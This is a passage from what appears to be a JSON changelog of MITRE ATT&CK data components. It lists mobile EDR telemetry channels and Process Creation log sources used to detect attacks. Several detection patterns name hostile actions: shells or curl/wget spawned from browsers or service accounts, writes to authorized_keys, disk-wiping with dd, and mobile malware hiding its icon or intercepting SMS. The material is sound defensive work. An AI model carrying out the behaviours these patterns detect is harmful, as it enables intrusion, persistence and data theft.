\"MobileEDR:telemetry\", \"channel\": \"Keypair generation, import, or access events (public/private key usage) occurring prior to network communication\"}, \"root['x_mitre_log_sources'][133]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment\"}, \"root['x_mitre_log_sources'][134]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain\"}, \"root['x_mitre_log_sources'][135]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer\"}, \"root['x_mitre_log_sources'][136]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload\"}, \"root['x_mitre_log_sources'][137]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase\"}, \"root['x_mitre_log_sources'][138]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission\"}, \"root['x_mitre_log_sources'][139]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain\"}, \"root['x_mitre_log_sources'][140]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment\"}, \"root['x_mitre_log_sources'][141]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation\"}, \"root['x_mitre_log_sources'][142]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase\"}, \"root['x_mitre_log_sources'][143]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase\"}, \"root['x_mitre_log_sources'][144]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase\"}, \"root['x_mitre_log_sources'][145]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase\"}, \"root['x_mitre_log_sources'][146]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase\"}, \"root['x_mitre_log_sources'][147]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases\"}, \"root['x_mitre_log_sources'][148]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase\"}, \"root['x_mitre_log_sources'][149]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase\"}, \"root['x_mitre_log_sources'][150]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior\"}, \"root['x_mitre_log_sources'][151]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase\"}, \"root['x_mitre_log_sources'][152]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events\"}, \"root['x_mitre_log_sources'][153]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application launches or executes code where loaded library or component path does not match application package path or expected signing context\"}, \"root['x_mitre_log_sources'][154]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval\"}, \"root['x_mitre_log_sources'][155]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed\"}, \"root['x_mitre_log_sources'][159]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match\"}, \"root['x_mitre_log_sources'][160]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition\"}, \"root['x_mitre_log_sources'][161]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match\"}, \"root['x_mitre_log_sources'][162]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression\"}, \"root['x_mitre_log_sources'][163]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence\"}, \"root['x_mitre_log_sources'][164]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation\"}, \"root['x_mitre_log_sources'][165]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground\"}, \"root['x_mitre_log_sources'][166]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state\"}, \"root['x_mitre_log_sources'][167]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss\"}, \"root['x_mitre_log_sources'][168]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss\"}, \"root['x_mitre_log_sources'][169]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-13 15:49:16.424000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0032",
                            "external_id": "DC0032"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Creation",
                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains pubsub or broker'"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution path inconsistent with baseline PATH directories"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with suspicious arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve network tools"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process reading browser configuration paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec logs"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of unexpected binaries during user shell startup"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of systemctl or service stop"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of launchctl or pkill"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process::exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Electron app spawning unexpected child process"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history or /etc/init.d/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn calls to proxy tools or torrent clients"
                        },
                        {
                            "name": "containers:osquery",
                            "channel": "bandwidth-intensive command execution from within a container namespace"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security, sqlite3, or unauthorized binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected applications generating outbound DNS queries"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected child process of Safari or Chrome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process writes or modifies files in excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.mail.* exec.*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "/var/log/vobd.log"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "kubectl exec or kubelet API calls targeting running pods"
                        },
                        {
                            "name": "docker:audit",
                            "channel": "Process execution events within container namespace context"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "process persists beyond parent shell termination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "background process persists beyond user logout"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process execution across cloud VM"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl spawning managed processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec events where web process starts a shell/tooling"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of osascript, bash, curl with suspicious parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events OR launchd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or process_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and file events via log stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process command line contains base64, -enc, openssl enc -base64"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: arguments contain Base64-like strings"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process launched via loginwindow session restore"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "/var/log/containers/*.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Java apps or other processes with hidden window attributes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process Execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve on code or jetbrains-gateway with remote flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, wipe targeting block devices"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process using AES/RC4 routines unexpectedly"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execution of known firewall binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of osascript, curl, or unexpected automation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec /usr/bin/pwpolicy"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
                        },
                        {
                            "name": "macos:endpointSecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:launch"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of scp, rsync, curl with remote destination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logMessage contains pbpaste or osascript"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app executing with parameters updating rules state"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "exec into pod followed by secret retrieval via API"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec srm|exec openssl|exec gpg"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process execution with LD_PRELOAD or modified library path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "process creation events linked to container namespaces executing host-level binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and signing chain events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices events for misleading extensions"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Execution of disguised binaries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process listening or connecting on non-standard ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd services binding to non-standard ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, connect"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "process or cron activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Invocation of osascript or dylib injection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of files saved in mail or download directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process start of Java or native DB client tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or tccd-related entries"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: process_events, launchd, and tcc.db access"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "process execution or network connect from just-created container PID namespace"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/exec of service via PID 1 (systemd)"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ssh or sftp without corresponding login event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of remote desktop app or helper binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl spawning new processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl activity and process creation"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "New container with suspicious image name or high resource usage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SSL routines from Security framework"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of bless or nvram modifying boot parameters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes registered with launchd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, osascript, or unexpected Office processes"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "spawned shell or execution environment activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve or dylib load from memory without backing file"
                        },
                        {
                            "name": "auditd:SYSCALL",
